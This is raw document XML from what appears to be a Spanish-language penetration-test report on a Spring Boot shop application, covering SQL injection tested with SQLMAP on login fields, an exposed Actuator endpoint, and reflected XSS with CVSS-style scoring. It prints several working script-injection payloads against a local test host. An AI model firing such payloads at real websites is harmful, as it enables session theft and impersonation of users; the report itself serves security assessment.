    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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descr="Texto&#10;&#10;Descripción generada automáticamente" id="46" name="image43.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>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OderLineRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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descr="Texto&#10;&#10;Descripción generada automáticamente" id="41" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>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OderRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente" id="27" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>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ProductRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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descr="Texto&#10;&#10;Descripción generada automáticamente" id="25" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>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UsersRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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903855"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="38" name="image47.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="540004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903855"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="62" name="image60.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="540004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Para probar el sql inyection podemos usar SQLMAP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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https://gotexploit.com/hacking/2019-03-04-SQLMap.-Cap%C3%ADtulo-3-POST/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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3">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5727700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Dando esto como resultado ejecutándose en la página login y probándose sobre los parámetros POST email y password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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5727700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aalvkj9ks02l" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qyvb46iyegey" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot Actuator v2 -&gt;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400040"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45"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400040" cy="540004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3">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400040"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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400040" cy="540004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Ejemplos de uso:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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11520"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33"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400040" cy="581152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Corrección:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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400040"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B0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ovd7rtbpwjz7" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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7"/>
        <w:gridCol w:w="4247"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4247"/>
            <w:gridCol w:w="4247"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">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B4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector de acceso </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">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Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Complejidad de acceso </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">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Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="410" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Autentificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidencialidad </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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Parcial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Puntuación base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Complejidad del ataque </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">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Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilegios requeridos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto disponibilidad </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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C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El JavaScript malicioso tiene acceso a todos los mismos objetos que la página web, incluyendo el acceso a las cookies, almacenamiento local, que a menudo se usa para guardar la sesión. Si un atacante puede obtener la cookie de sesión de un usuario puede hacerse pasar por él.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Además, JavaScript pude leer y modificar arbitrariamente el contenido de una página que se muestra a un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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C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C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C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Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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CC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Products:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:spacing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CF">
      <w:pPr>
        <w:spacing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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:spacing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D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="1"/>
            <w:color w:val="666699"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.1.22:8888/products/;jsessionid=A50FC5E8699A6B7819C4FE14B27ABC42?category='"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x007FB0)&lt;/scRipt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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400040"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D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Login Email (POST):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:spacing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D7">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Payload: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x00EE7F)&lt;/scRipt&gt;"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing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Products Category (GET):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:spacing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DB">
      <w:pPr>
        <w:spacing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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:spacing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DD">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://192.168.1.22:8888/products/?category='"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x00218C)&lt;/scRipt&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="666699"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
